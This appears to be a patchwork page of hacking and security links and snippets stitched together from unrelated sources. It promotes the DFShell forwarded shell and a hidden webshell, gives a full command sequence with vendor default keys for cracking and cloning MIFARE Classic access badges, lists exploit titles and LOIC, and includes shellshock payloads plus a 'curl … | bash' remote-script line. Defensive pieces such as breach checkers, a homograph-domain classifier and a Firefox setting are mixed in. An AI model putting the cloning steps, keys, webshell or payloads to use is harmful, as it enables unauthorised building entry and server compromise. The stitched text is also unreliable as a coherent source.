How long it take to CRACK your password ??
DFShell - The Best Forwarded Shell
D3Ext's Forwarded Shell is a python3 script which uses mkfifo to simulate a shell on the victim machine. It creates a hidden directory in /dev/shm/.fs/, where the FIFOs are stored. You can even have a tty over a webshell.
In case you want a good webshell with code obfuscation, a login panel and more functions, you have this webshell (scripted by me). You can change the username and the password at the top of the file. It also has a little protection in case of being discovered: if the webshell is accessed from localhost, it gives a 404 status code.
Why should you use DFShell?
To use other forwarded shells you have to edit the script to change the URL and the parameter of the webshell, but DFShell uses parameters to quickly pass the arguments to the script (-u/--url and -p/--parameter). The script has a pretty output with colors. You also have custom commands to upload and download files from the target and to do port and host discovery, and it deletes the files created on the victim if you press Ctrl + C or simply exit from the shell.
If you change the current user from the webshell (or anything becomes unstable), then execute: 'sh'
Flipper Zero
Flipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body. It loves hacking digital stuff, such as radio protocols, access control systems, hardware and more. It's fully open-source and customizable, so you can extend it in whatever way you like.
Analysis Report http://winnti-scanner-victims-will-be-notified.threatsinkhole.com
Exploits of the week
Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
Code Blocks 20.03 - Denial Of Service (PoC)
WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
WebPort 1.19.1 - Cross Site Scripting
Frigate 2.02 - Denial Of Service (PoC)
Responsive Online Blog 1.0 - 'id' SQL Injection
Trend Micro Web Security - Remote Code Execution
Lansweeper 7.2 Default Account / Remote Code Execution
Student Enrollment 1.0 - Remote Code Execution
FileRun CVE-2019-12905 - Cross Site Scripting
pentest test hack vul
Accounts
8,165,160,541
Leaks
810
Leaked accounts per day
879,875
Is someone spying on you?
Everyday personal data is stolen in criminal cyber attacks. A large part of the stolen information is subsequently made public on Internet databases, where it serves as the starting point for other illegal activities.
With the HPI Identity Leak Checker, it is possible to check whether your email address, along with other personal data (e.g. telephone number, date of birth or address), has been made public on the Internet where it can be misused for malicious purposes.
sudo apt install libnfc-dev libnfc5 libnfc-bin libusb-dev make gcc unzip automake
wget -O mfoc-master.zip https://github.com/nfc-tools/mfoc/archive/master.zip
unzip mfoc-master.zip
rm mfoc-master.zip
cd mfoc-master/
autoreconf -vis
./configure
make
sudo make install
cd ..
nfc-list
sudo modprobe -r pn533-usb pn533 nfc
sudo nano /etc/modprobe.d/blacklist-libnfc.conf
blacklist pn533_usb
blacklist pn533
blacklist nfc
wget -O mfcuk-master.zip https://github.com/DrSchottky/mfcuk/archive/master.zip
unzip mfcuk-master.zip
rm mfcuk-master.zip
cd mfcuk-master/
autoreconf -vfi
./configure
sed -i "s#./data/tmpls#/usr/share/mfcuk/data/tmpls#" src/mfcuk_finger.c
sudo mkdir -p /usr/share/mfcuk/data/
sudo cp -r src/data/* /usr/share/mfcuk/data/
make
sudo make install
cd ..
mfoc -k 8829da9daf76 -O badge.dmp
mfcuk -C -R 0:A -s 250 -S 250 -v 3 > log_mfcuk&
tail -f log_mfcuk
pgrep mfcuk
kill -15 <mfcuk pid>
mfoc -k XXXXXXXXXXXX -O badge.dmp
mfoc -P 500 -O new_carte.dmp
nfc-mfclassic W a badge.dmp new_carte.dmp
Sources:
https://zozs.se/2014/08/18/acr122u-mfcuk-mfoc-cracking-mifare-classic-on-arch-linux/
http://www.latelierdugeek.fr/2015/07/17/dupliquer-contenu-puce-rfid-mifare-classic/
https://geekz0ne.fr/wiki/doku.php?id=modifier_informations_badges_selecta
Ixeygrek (thanks ;-) )
Some keys:
bticino : 021209197591
urmet : 8829da9daf76
ALARON BLARON : 414C41524F4E
generic : D3F7D3F7D3F7
Intratone : 484558414354
Comelit : 4A6352684677
https://github.com/iceman1001/proxmark3
https://github.com/iceman1001/proxmark3/blob/master/client/default_keys.dic
Your right to be safe from hacking starts now.
Firefox Monitor gives you tools to keep your personal information safe. Find out which personal data is accessible to cybercriminals and learn how to protect yourself.
See if you have been involved in a data breach.
VULNERABILITY AND TOOLS SEARCH ENGINE
This is a simple place where you can download crackmes to improve your reverse engineering skills. If you want to submit a crackme or a solution to one of them, you must register. But before that, I strongly recommend you to read the FAQ
Number of users:
1500
Number of crackmes:
3016
Number of solutions:
4206
Inj3ct0r is the ultimate database of exploits and vulnerabilities and a great resource for vulnerability researchers and security professionals.
Our aim is to collect exploits from submittals and various mailing lists and concentrate them in one, easy-to-navigate database.
This was written solely for educational purposes. Use it at your own risk. The author will not be responsible for any damage. // r0073r
0day.today Available within TOR at http://mvfjfugdwgc5uwho.onion
Simple IOC Scanner
Scanner for Simple Indicators of Compromise
PHP scanner written in Python for identifying PHP backdoors and malicious PHP code. This tool mainly reuses the tools mentioned below. To use this tool, you need to install the yara library for Python from source.
Does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malwares/webshells. Detection is performed by crawling the filesystem and testing files against a set of YARA rules.
Scans the current working directory and displays results with a score greater than the given value. Released under the MIT license.
an open source program which looks for security vulnerabilities, code-quality, performance, and conformance.
Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.
A static source code analyser for vulnerabilities in PHP scripts.
an open source web server scanner which performs comprehensive tests against web servers for multiple items, including potentially dangerous files/program.
ClamAV extension for PHP (php-clamav) - a fork of the php-clamavlib project that allows you to incorporate virus scanning features in your PHP scripts.
Check also the following security websites:
Founded in January 2005, the PHP Security Consortium (PHPSC) is an international group of PHP experts dedicated to promoting secure programming practices within the PHP community. Members of the PHPSC seek to educate PHP developers about security through a variety of resources, including documentation, tools, and standards.
Security researcher Xudong Zheng has published a very interesting article on domain names forged in punycode with exotic characters, the encoding that solves the problem of internationalizing domain names in other alphabets.
It is well-intentioned, but as always there are a few weaknesses in it. From a security standpoint it is problematic, because certain characters are hard to tell apart from other, more common characters. For example, if you register the domain name "xn--pple-43d.com", it will be displayed in your browser like this: "аpple.com". You cannot see it at first glance, but what you think is the "a" of Apple (in ASCII: U+0061) is in fact the Cyrillic character "а" (code point: U+0430).
This technique, which I have already covered on this site and which is used mainly in phishing attacks, is known as a homograph attack.
Fortunately, recent browsers limit these attacks when they detect a mix of ordinary characters and international characters. But Chrome, Firefox and Opera all fail when the entire domain name consists only of international characters. For example, the domain name "аpple.com", which is actually registered as "xn--80ak6aa92e.com", manages to bypass the protection by using only Cyrillic characters.
You can test this yourself via this URL.
https://www.аррӏе.com/
Type the following into the URL field:
about:config
Then look for the key:
network.IDN_show_punycode
And set it to TRUE.
Exotic domain names will then be displayed in punycode form, which will keep you from falling into the trap.
Otherwise, when in doubt, what you can do is retype the URL yourself.
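The distinction the article draws between the mixed-script case that browsers flag and the whole-script case that slips through can be checked on the defender's side, for example when triaging URLs from mail or proxy logs. The following Python sketch is an added example, not code from the original article; the function names are hypothetical, and approximating a character's script by the first word of its Unicode name is an assumption made for brevity.

```python
import unicodedata

def decode_label(label):
    """Return the Unicode form of one DNS label ('xn--' labels are punycode)."""
    if label.lower().startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label

def scripts_in(text):
    """Approximate each character's script by the first word of its Unicode name."""
    scripts = set()
    for ch in text:
        if ch.isdigit() or ch == "-":      # digits and hyphen belong to no script
            continue
        scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts

def classify_label(label):
    """Classify one label as ascii, mixed-script or whole-script:<SCRIPT>."""
    try:
        text = decode_label(label)
    except UnicodeError:
        return "invalid-punycode"
    if text.isascii():
        return "ascii"
    scripts = scripts_in(text)
    if len(scripts) > 1:
        return "mixed-script"              # the case browsers already flag
    # Every letter comes from one non-Latin script: the case the article
    # says is displayed as a normal name.
    return "whole-script:" + next(iter(scripts), "UNKNOWN")

def classify_host(host):
    """Classify every label of a hostname."""
    return {label: classify_label(label) for label in host.rstrip(".").split(".")}

if __name__ == "__main__":
    # The two punycode names are the ones quoted in the article above.
    for host in ("apple.com", "xn--pple-43d.com", "xn--80ak6aa92e.com"):
        print(host, classify_host(host))
```

A whole-script result is not proof of abuse, since legitimate names in Cyrillic or other scripts classify the same way; it marks the labels worth comparing against the brands you care about.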
include vulnerability
ABOUT
hackmud is a cyberpunk themed text-based hacking simulator for intel-compatible personal home computers. Get lost in a deep and complex world full of challenging puzzles.
Find the source of your leaks
There are currently 1,976,046,540 accounts in our database.
exploits
A DIY Guide #antisec
tool secu windows // hack Phrozen Freeware
Default password
Below you will find a list of default (factory) passwords for various devices.
To offer you a quality list of passwords, all the passwords have been verified.
secu hack site list defacement
Many people ask a recurring question on forums: "My X account has been hacked, how do I get it back?". Here is a reference guide that lists the various options and procedures for each web service.
I, NewEraCracker, am not responsible for how you use this tool. You cannot blame me if you get caught for attacking servers you don't own. This tool is released for educational purposes only, and comes with no warranty at all.
HOW TO RUN ON WINDOWS
GET THE BINARIES!
Requires Microsoft .NET Framework 3.5 Service Pack 1, available at: http://www.microsoft.com/downloads/en/details.aspx?FamilyID=ab99342f-5d1a-413d-8319-81da479ab0d7&displaylang=en
HOW TO RUN ON LINUX / MACOSX
LOIC Hack Stress test
shellshocker
What is #shellshock?
Shellshock (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system. If your system has not updated bash since Tue Sep 30 2014: 1:32PM EST (See patch history), you're most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD.
You can use this website to test if your system is vulnerable, and also learn how to patch the vulnerability so you are no longer at risk for attack.
You can test if a system is vulnerable by using the form below. Just provide a http or https url and test away!
Please test responsibly. All tests details are logged. Do not test against websites that you do not have permission to test against. All data is archived in case of abuse.
Here is an example script that is vulnerable. Place this in your /cgi-bin/shockme.cgi and try hitting it with the shock tester.
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"
Last updated Friday September 26th at 4:43PM EST: This website tester will now wait for a valid response before returning the state of the vulnerability. If the server responds with a 500 we assume you're vulnerable and we display the response immediately without waiting. If we get any other response code we will wait 3 seconds for a reply from your server and display if you're vulnerable or not.
Testing Your System
To test your system, you can simply run this one liner below to find if you're vulnerable.
curl https://shellshocker.net/shellshock_test.sh | bash
You can view the source of shellshock_test.sh on GitHub.
If you want to test each exploit individually without running the script above, feel free! They are listed below.
Exploit 1 (CVE-2014-6271)
There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.
Exploit 2 (CVE-2014-7169)
Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.
env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo
If the above command outputs the current date (it may also show errors), you are still vulnerable.
Exploit 3 (???)
Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.
env X=' () { }; echo hello' bash -c 'date'
If the above command outputs "hello", you are vulnerable.
Exploit 4 (CVE-2014-7186)
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"
A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
Exploit 5 (CVE-2014-7187)
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"
A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
Exploit 6 (CVE-2014-6278)
shellshocker='() { echo You are vulnerable; }' bash -c shellshocker
You shouldn't see "You are vulnerable". If you're patched, you will see "bash: shellshocker: command not found".
Exploit 7 (CVE-2014-6277)
bash -c "f() { x() { ;}; x() { ;} <<a; }" 2>/dev/null || echo vulnerable
If the command outputs "vulnerable", you are vulnerable.
If you've tested your system, please leave a comment below. Don't forget to include your bash version and what OS you're running. Type bash --version for bash, and cat /etc/release for your OS.
Indexeus
Account recovery, People Search & Consultancy made easy!
The universal tracker present on PCs, Macs and Android devices « Korben
Heartbleed: critical flaw in OpenSSL, emergency patches available | UnderNews
Port 32764 open on Linksys and Netgear routers is a backdoor
Threat Intelligence Group
A Team Cymru EIS Report: Growing Exploitation of Small Office Routers Creating Serious Risks
www.team-cymru.com
Switch from Google's location service to Mozilla's own in Firefox | Ghacks
Welcome [Root Me: learning platform dedicated to Hacking and Information Security]
NewbieContest: French-language computing challenge
Korben
Top 10 hackers arrested in 2013 | UnderNews
Kali Linux Official Documentation